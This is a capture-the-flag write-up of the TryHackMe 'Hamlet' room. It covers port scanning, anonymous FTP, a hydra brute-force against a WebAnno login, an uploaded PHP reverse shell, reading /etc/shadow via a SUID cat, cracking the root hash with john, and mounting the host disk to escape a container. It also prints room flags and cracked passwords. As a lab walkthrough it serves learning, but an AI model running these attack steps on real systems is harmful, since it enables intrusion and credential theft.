Halmet (FTP, Web, Hydra, Container)
First, we need to enumerate using rustscan.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ rustscan -a 10.10.74.234 -- -A | tee rust.log
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.74.234:21
Open 10.10.74.234:22
Open 10.10.74.234:80
Open 10.10.74.234:501
Open 10.10.74.234:8000
Open 10.10.74.234:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-22 04:38 +0630
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Initiating Ping Scan at 04:38
Scanning 10.10.74.234 [2 ports]
Completed Ping Scan at 04:38, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:38
Completed Parallel DNS resolution of 1 host. at 04:38, 0.32s elapsed
DNS resolution of 1 IPs took 0.32s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:38
Scanning 10.10.74.234 [6 ports]
Discovered open port 22/tcp on 10.10.74.234
Discovered open port 8080/tcp on 10.10.74.234
Discovered open port 21/tcp on 10.10.74.234
Discovered open port 80/tcp on 10.10.74.234
Discovered open port 8000/tcp on 10.10.74.234
Discovered open port 501/tcp on 10.10.74.234
Completed Connect Scan at 04:38, 0.33s elapsed (6 total ports)
Initiating Service scan at 04:38
Scanning 6 services on 10.10.74.234
Completed Service scan at 04:38, 28.66s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.74.234.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
NSE: [ftp-bounce 10.10.74.234:21] PORT response: 500 Illegal PORT command.
Completed NSE at 04:38, 13.82s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 1.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Nmap scan report for 10.10.74.234
Host is up, received syn-ack (0.28s latency).
Scanned at 2022-04-22 04:38:07 +0630 for 45s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxr-xr-x 1 0 0 113 Sep 15 2021 password-policy.md
|_-rw-r--r-- 1 0 0 1425 Sep 15 2021 ufw.status
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.0.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a0:ef:4c:32:28:a6:4c:7f:60:d6:a6:63:32:ac:ab:27 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5/i3O28uWolhittypXr6mAEk+XOV998o/e/3wIWpGq9J1GhtGc3J4uwYpBt7SiS3mZivq9D5jgFhqhHb6zlBsQmGUnXUnQNYyqrBmGnyl4urp5IuV1sRCdNXQdt/lf6Z9A807OPuCkzkAexFUV28eXqdXpRsXXkqgkl5DCm2WEtV7yxPIbGlcmX+arDT9A5kGTZe9rNDdqzSafz0aVKRWoTHGHuqVmq0oPD3Cc3oYfoLu7GTJV+Cy6Hxs3s6oUVcruoi1JYvbxC9whexOr+NSZT9mGxDSDLS6jEMim2DQ+hNhiT49JXcMXhQ2nOYqBXLZF0OYyNKaGdgG35CIT40z
| 256 5a:6d:1a:39:97:00:be:c7:10:6e:36:5c:7f:ca:dc:b2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHtt/3Q8agNKO48Zw3srosCs+bfCx47O+i4tBUX7VGMSpzTJQS3s4DBhGvrvO+d/u9B4e9ZBgWSqo+aDqGsTZxQ=
| 256 0b:77:40:b2:cc:30:8d:8e:45:51:fa:12:7c:e2:95:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4jv01JeDGsDfhWIJMF8HBv26FI18VLpBeNoiSGbKVp
80/tcp open http syn-ack lighttpd 1.4.45
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: lighttpd/1.4.45
|_http-title: Hamlet Annotation Project
501/tcp open tcpwrapped syn-ack
8000/tcp open http syn-ack Apache httpd 2.4.48 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open http-proxy syn-ack
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 500
| Content-Type: application/json;charset=UTF-8
| Date: Thu, 21 Apr 2022 22:07:15 GMT
| Connection: close
| {"timestamp":1650578836324,"status":500,"error":"Internal Server Error","exception":"org.springframework.security.web.firewall.RequestRejectedException","message":"The request was rejected because the URL contained a potentially malicious String "%2e"","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 302
| Set-Cookie: JSESSIONID=F8DCBDEE2802FAC1360A8FCD3F336AAF; Path=/; HttpOnly
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: SAMEORIGIN
| Location: http://localhost:8080/login.html
| Content-Length: 0
| Date: Thu, 21 Apr 2022 22:07:14 GMT
| Connection: close
| HTTPOptions:
| HTTP/1.1 302
| Set-Cookie: JSESSIONID=17B11B72A74402B64F4CFCC41497126B; Path=/; HttpOnly
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: SAMEORIGIN
| Location: http://localhost:8080/login.html
| Content-Length: 0
| Date: Thu, 21 Apr 2022 22:07:14 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Thu, 21 Apr 2022 22:07:15 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
|_http-favicon: Unknown favicon MD5: 0488FACA4C19046B94D07C3EE83CF9D6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
| http-title: WebAnno - Log in
|_Requested resource was http://10.10.74.234:8080/login.html
|_http-trane-info: Problem with XML parsing of /evox/about
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=4/22%Time=6261D5CF%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,18F,"HTTP/1\.1\x20302\x20\r\nSet-Cookie:\x20JSESSIONID=F8DCBDE
SF:E2802FAC1360A8FCD3F336AAF;\x20Path=/;\x20HttpOnly\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nCache-Cont
SF:rol:\x20no-cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nPrag
SF:ma:\x20no-cache\r\nExpires:\x200\r\nX-Frame-Options:\x20SAMEORIGIN\r\nL
SF:ocation:\x20http://localhost:8080/login\.html\r\nContent-Length:\x200\r
SF:\nDate:\x20Thu,\x2021\x20Apr\x202022\x2022:07:14\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n")%r(HTTPOptions,18F,"HTTP/1\.1\x20302\x20\r\nSet-Cooki
SF:e:\x20JSESSIONID=17B11B72A74402B64F4CFCC41497126B;\x20Path=/;\x20HttpOn
SF:ly\r\nX-Content-Type-Options:\x20nosniff\r\nX-XSS-Protection:\x201;\x20
SF:mode=block\r\nCache-Control:\x20no-cache,\x20no-store,\x20max-age=0,\x2
SF:0must-revalidate\r\nPragma:\x20no-cache\r\nExpires:\x200\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nLocation:\x20http://localhost:8080/login\.html\r
SF:\nContent-Length:\x200\r\nDate:\x20Thu,\x2021\x20Apr\x202022\x2022:07:1
SF:4\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1
SF:\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lang
SF:uage:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Thu,\x2021\x20Apr\x20
SF:2022\x2022:07:15\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20htm
SF:l><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x
SF:93\x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-f
SF:amily:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:whi
SF:te;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font
SF:-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\
SF:x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;bor
SF:der:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x9
SF:3\x20Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,1A4,"HTTP/
SF:1\.1\x20500\x20\r\nContent-Type:\x20application/json;charset=UTF-8\r\nD
SF:ate:\x20Thu,\x2021\x20Apr\x202022\x2022:07:15\x20GMT\r\nConnection:\x20
SF:close\r\n\r\n{\"timestamp\":1650578836324,\"status\":500,\"error\":\"In
SF:ternal\x20Server\x20Error\",\"exception\":\"org\.springframework\.secur
SF:ity\.web\.firewall\.RequestRejectedException\",\"message\":\"The\x20req
SF:uest\x20was\x20rejected\x20because\x20the\x20URL\x20contained\x20a\x20p
SF:otentially\x20malicious\x20String\x20\\\"%2e\\\"\",\"path\":\"/nice%20p
SF:orts%2C/Tri%6Eity\.txt%2ebak\"}");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.84 secondsPort 21
You can't list the current file list in normal way.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.You need to enable passive mode.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> dir \
227 Entering Passive Mode (10,10,24,134,199,33).
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 113 Sep 15 2021 password-policy.md
-rw-r--r-- 1 0 0 1425 Sep 15 2021 ufw.status
226 Directory send OK.Download this two files.
ftp> get password-policy.md
local: password-policy.md remote: password-policy.md
227 Entering Passive Mode (10,10,24,134,195,187).
150 Opening BINARY mode data connection for password-policy.md (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (175.7190 kB/s)
ftp> get ufw.status
local: ufw.status remote: ufw.status
227 Entering Passive Mode (10,10,24,134,197,37).
150 Opening BINARY mode data connection for ufw.status (1425 bytes).
226 Transfer complete.
1425 bytes received in 0.00 secs (1.6314 MB/s)Read the files. Password Policy file is quite interesting.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ cat password-policy.md
# Password Policy
## WebAnno
New passwords should be:
- lowercase
- between 12 and 14 characters long
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ cat ufw.status
Status: active
To Action From
-- ------ ----
20/tcp ALLOW Anywhere
21/tcp ALLOW Anywhere
22/tcp ALLOW Anywhere
80/tcp ALLOW Anywhere
501/tcp ALLOW Anywhere
8080/tcp ALLOW Anywhere
8000/tcp ALLOW Anywhere
1603/tcp ALLOW Anywhere
1564/tcp ALLOW Anywhere
50000:50999/tcp ALLOW Anywhere
20/tcp (v6) ALLOW Anywhere (v6)
21/tcp (v6) ALLOW Anywhere (v6)
22/tcp (v6) ALLOW Anywhere (v6)
80/tcp (v6) ALLOW Anywhere (v6)
501/tcp (v6) ALLOW Anywhere (v6)
8080/tcp (v6) ALLOW Anywhere (v6)
8000/tcp (v6) ALLOW Anywhere (v6)
1603/tcp (v6) ALLOW Anywhere (v6)
1564/tcp (v6) ALLOW Anywhere (v6)
50000:50999/tcp (v6) ALLOW Anywhere (v6)Port 80
You can see the default webpage.
Attach ip and domain name in /etc/hosts.
echo '10.10.74.234 hamlet.thm' >> /etc/hostsIn robots.txt, you will see flag1.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ curl http://10.10.74.234/robots.txt
User-agent: *
Allow: /
THM{1_most_mechanical_and_dirty_hand}Digging sub directory using gobuster.
Nothing interestingPort 501
You can grep your second flag by connecting port using nc and answering question. Here is the
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ nc 10.10.74.234 501
GRAVEDIGGER
What do you call a person who builds stronger things than a stonemason, a shipbuilder, or a carpenter does?
PENTESTER
The one who builds the gallows to hang people on, since his structure outlives a thousand inhabitants.
THM{2_ophelia_s_grave}Port 8000
When you browser to http://10.10.74.234:8000/, it shows only some of the useless text. You will found something after inspect it.
<iframe style="width:100%; height:100%" src="/repository/project/0/document/0/source/hamlet.txt"></iframe>Let's use gobuster to enumerate it.
Nothing interestingPort 8080
When you browser to http://10.10.74.234:8080/login.html, you will see default webanno page. You can found username on http://10.10.74.234/, which is ghost. password-policy.md said New Passwords should be between 12 and 14 characters long. So, we need to generate password from http://10.10.74.234:8080.
cewl -m 12 http://10.10.74.234:8000/repository/project/0/document/0/source/hamlet.txt > pass.txtBruteforce using hydra.
hydra -l ghost -P pass.txt 10.10.74.234 -s 8080 http-post-form "/login.html?-1.-loginForm:urlfragment=&username=^USER^&password=^PASS^&Login=Login:'Login failed'"I successfully bruteforce using burp. Here is complete credential ghost:vnsanctified
In project page, you can find different user.
After you changed the password of ophelia and login back again, you can find different ftp password KEQehFDWwuQbMbKW
You can find 3rd flag by connecting ftp with ophelia:vnsanctified
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): ophelia
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,229,96,195,232).
150 Here comes the directory listing.
-rw-r--r-- 1 1001 1001 31 Sep 16 2021 flag
226 Directory send OK.
ftp> get flag
local: flag remote: flag
227 Entering Passive Mode (10,10,229,96,197,61).
150 Opening BINARY mode data connection for flag (31 bytes).
226 Transfer complete.
31 bytes received in 0.01 secs (5.9676 kB/s)
ftp> You can find 4rd flag at /opt.
ftp> pwd
257 "/home/ophelia" is the current directory
ftp> cd /
250 Directory successfully changed.
ftp> dir
227 Entering Passive Mode (10,10,229,96,198,75).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Sep 15 2021 bin
drwxr-xr-x 4 0 0 4096 Sep 15 2021 boot
drwxr-xr-x 2 0 0 4096 Sep 15 2021 cdrom
drwxr-xr-x 18 0 0 3760 Apr 22 23:20 dev
drwxr-xr-x 99 0 0 4096 Sep 16 2021 etc
drwxr-xr-x 5 0 0 4096 Sep 15 2021 home
lrwxrwxrwx 1 0 0 34 Sep 15 2021 initrd.img -> boot/initrd.img-4.15.0-156-generic
lrwxrwxrwx 1 0 0 34 Sep 15 2021 initrd.img.old -> boot/initrd.img-4.15.0-156-generic
drwxr-xr-x 23 0 0 4096 Sep 15 2021 lib
drwxr-xr-x 2 0 0 4096 Aug 06 2020 lib64
drwx------ 2 0 0 16384 Sep 15 2021 lost+found
drwxr-xr-x 2 0 0 4096 Aug 06 2020 media
drwxr-xr-x 3 0 0 4096 Sep 15 2021 mnt
drwxr-xr-x 5 0 0 4096 Sep 15 2021 opt
dr-xr-xr-x 115 0 0 0 Apr 22 23:20 proc
drwx------ 5 0 0 4096 Sep 15 2021 root
drwxr-xr-x 30 0 0 1020 Apr 22 23:25 run
drwxr-xr-x 2 0 0 12288 Sep 15 2021 sbin
drwxr-xr-x 2 0 0 4096 Sep 15 2021 snap
drwxr-xr-x 4 0 0 4096 Sep 15 2021 srv
-rw------- 1 0 0 4111466496 Sep 15 2021 swap.img
dr-xr-xr-x 13 0 0 0 Apr 22 23:20 sys
drwxrwxrwt 9 0 0 4096 Apr 22 23:25 tmp
drwxr-xr-x 10 0 0 4096 Aug 06 2020 usr
drwxr-xr-x 14 0 0 4096 Sep 15 2021 var
lrwxrwxrwx 1 0 0 31 Sep 15 2021 vmlinuz -> boot/vmlinuz-4.15.0-156-generic
lrwxrwxrwx 1 0 0 31 Sep 15 2021 vmlinuz.old -> boot/vmlinuz-4.15.0-156-generic
226 Directory send OK.
ftp> cd /opt
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (10,10,229,96,196,56).
150 Here comes the directory listing.
drwx--x--x 4 0 0 4096 Sep 15 2021 containerd
drwxr-xr-x 2 0 0 4096 Sep 15 2021 stage
drwxr-xr-x 2 0 0 4096 Sep 15 2021 web
226 Directory send OK.
ftp> cd stage
250 Directory successfully changed.
ftp> dir
227 Entering Passive Mode (10,10,229,96,197,175).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 29 Sep 16 2021 flag
226 Directory send OK.
ftp> get flag
local: flag remote: flag
227 Entering Passive Mode (10,10,229,96,197,72).
150 Opening BINARY mode data connection for flag (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (20.1855 kB/s)User
Let's upload a reverse shell.
Call back the curl.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet
╰─➤ curl http://10.10.74.234:8000/repository/project/0/document/1/source/rev.phpIn netcat session, we got a reverse shell.
Find Interesting permission which is running with root.
$ find / -type f -user root -perm -4000 2>/dev/null
/bin/umount
/bin/mount
/bin/cat
/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chshWith cat command, we can read shadows file.
$ /bin/cat /etc/shadow
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:18885:0:99999:7:::
daemon:*:18872:0:99999:7:::
bin:*:18872:0:99999:7:::
sys:*:18872:0:99999:7:::
sync:*:18872:0:99999:7:::
games:*:18872:0:99999:7:::
man:*:18872:0:99999:7:::
lp:*:18872:0:99999:7:::
mail:*:18872:0:99999:7:::
news:*:18872:0:99999:7:::
uucp:*:18872:0:99999:7:::
proxy:*:18872:0:99999:7:::
www-data:*:18872:0:99999:7:::
backup:*:18872:0:99999:7:::
list:*:18872:0:99999:7:::
irc:*:18872:0:99999:7:::
gnats:*:18872:0:99999:7:::
nobody:*:18872:0:99999:7:::
_apt:*:18872:0:99999:7:::
$ /bin/cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologinUnshadow the file.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow
╰─➤ unshadow ./passwd ./shadow > unshadowed
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow
╰─➤ cat unshadowed
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:0:0:root:/root:/bin/bashCrack password using john the ripper.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow
╰─➤ john unshadowed --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
murder (root)
1g 0:00:01:32 100% 0.01083g/s 53.03p/s 53.03c/s 53.03C/s yessica..FUCKYOU
Use the "--show" option to display all of the cracked passwords reliably
Session completedChange to root user.
$ su root
Password: murder
whoami
rootRead the flag.
cd /root
ls
ls -al
total 20
drwx------ 1 root root 4096 Sep 15 2021 .
drwxr-xr-x 1 root root 4096 Sep 15 2021 ..
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
-rw-r--r-- 1 root root 24 Sep 16 2021 .flag
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
cat .flag
THM{5_murder_most_foul}Root
Humm?? What is dm-0
ls -al /dev/ | grep disk
crw-rw---- 1 root disk 10, 234 Apr 23 01:46 btrfs-control
brw-rw---- 1 root disk 253, 0 Apr 23 01:46 dm-0
crw-rw---- 1 root disk 10, 237 Apr 23 01:46 loop-control
brw-rw---- 1 root disk 7, 0 Apr 23 01:46 loop0
brw-rw---- 1 root disk 7, 1 Apr 23 01:46 loop1
brw-rw---- 1 root disk 7, 2 Apr 23 01:46 loop2
brw-rw---- 1 root disk 7, 3 Apr 23 01:46 loop3
brw-rw---- 1 root disk 7, 4 Apr 23 01:46 loop4
brw-rw---- 1 root disk 7, 5 Apr 23 01:46 loop5
brw-rw---- 1 root disk 7, 6 Apr 23 01:46 loop6
brw-rw---- 1 root disk 7, 7 Apr 23 01:46 loop7
brw-rw---- 1 root disk 202, 0 Apr 23 01:46 xvda
brw-rw---- 1 root disk 202, 1 Apr 23 01:46 xvda1
brw-rw---- 1 root disk 202, 2 Apr 23 01:46 xvda2
brw-rw---- 1 root disk 202, 3 Apr 23 01:46 xvda3
brw-rw---- 1 root disk 202, 112 Apr 23 01:46 xvdhMount the disk.
mkdir /root/lol
mount /dev/dm-0 /root/lol
ls -al /root/lol
total 4015224
drwxr-xr-x 24 root root 4096 Sep 15 2021 .
drwx------ 1 root root 4096 Apr 23 02:17 ..
drwxr-xr-x 2 root root 4096 Sep 15 2021 bin
drwxr-xr-x 2 root root 4096 Sep 15 2021 boot
drwxr-xr-x 2 root root 4096 Sep 15 2021 cdrom
drwxr-xr-x 4 root root 4096 Aug 6 2020 dev
drwxr-xr-x 99 root root 4096 Sep 16 2021 etc
drwxr-xr-x 5 root root 4096 Sep 15 2021 home
lrwxrwxrwx 1 root root 34 Sep 15 2021 initrd.img -> boot/initrd.img-4.15.0-156-generic
lrwxrwxrwx 1 root root 34 Sep 15 2021 initrd.img.old -> boot/initrd.img-4.15.0-156-generic
drwxr-xr-x 23 root root 4096 Sep 15 2021 lib
drwxr-xr-x 2 root root 4096 Aug 6 2020 lib64
drwx------ 2 root root 16384 Sep 15 2021 lost+found
drwxr-xr-x 2 root root 4096 Aug 6 2020 media
drwxr-xr-x 3 root root 4096 Sep 15 2021 mnt
drwxr-xr-x 5 root root 4096 Sep 15 2021 opt
drwxr-xr-x 2 root root 4096 Apr 24 2018 proc
drwx------ 5 root root 4096 Sep 15 2021 root
drwxr-xr-x 13 root root 4096 Aug 6 2020 run
drwxr-xr-x 2 root root 12288 Sep 15 2021 sbin
drwxr-xr-x 2 root root 4096 Sep 15 2021 snap
drwxr-xr-x 4 root root 4096 Sep 15 2021 srv
-rw------- 1 root root 4111466496 Sep 15 2021 swap.img
drwxr-xr-x 2 root root 4096 Apr 24 2018 sys
drwxrwxrwt 9 root root 4096 Apr 23 02:09 tmp
drwxr-xr-x 10 root root 4096 Aug 6 2020 usr
drwxr-xr-x 14 root root 4096 Sep 15 2021 var
lrwxrwxrwx 1 root root 31 Sep 15 2021 vmlinuz -> boot/vmlinuz-4.15.0-156-generic
lrwxrwxrwx 1 root root 31 Sep 15 2021 vmlinuz.old -> boot/vmlinuz-4.15.0-156-genericRead the final flag.
cd /root/lol/root/
dir
flag
cat flag
THM{6_though_this_be_madness_yet_there_is_method_in_t}Last updated
Was this helpful?